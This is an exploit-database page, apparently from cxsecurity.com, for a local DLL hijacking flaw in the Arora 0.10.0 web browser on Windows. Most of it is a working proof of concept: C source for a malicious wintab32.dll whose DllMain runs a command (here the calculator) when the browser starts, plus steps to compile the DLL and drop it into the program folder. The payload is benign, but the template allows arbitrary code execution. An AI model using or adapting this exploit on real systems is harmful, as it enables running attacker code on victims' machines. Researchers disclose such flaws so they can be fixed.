Arora 0.10.0 Windows Qt 4.5.3 DLL Hijack

2012.10.29
Credit: Metropolis
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

/* # Exploit Title: Arora 0.10.0 Windows Qt 4.5.3 DLL Hijacking Exploit (wintab32.dll) # Date: 27/10/2012 # Author: Metropolis # Url: http://metropolis.fr.cr # Software Link: http://code.google.com/p/arora/downloads/detail?name=Arora%200.10.0-1%20Installer.exe&can=2&q= # Version: 0.10.0 # Tested on: Windows 7 # Information: # http://code.google.com/p/arora/ # Instructions: # 1. Compile dll # gcc -shared -o wintab32.dll wintab32.c # 2. Add wintab32.dll # C:\Program Files (x86)\Arora # 3. Launch Arora.exe # 4. Calc DLL Hijacked! */ #include <windows.h> int pwnme() { WinExec("calc", SW_NORMAL); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { pwnme(); return 0; }

References:

http://metropolis.fr.cr
http://code.google.com/p/arora/downloads/detail?name=Arora%200.10.0-1%20Installer.exe&can=2&q
=


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top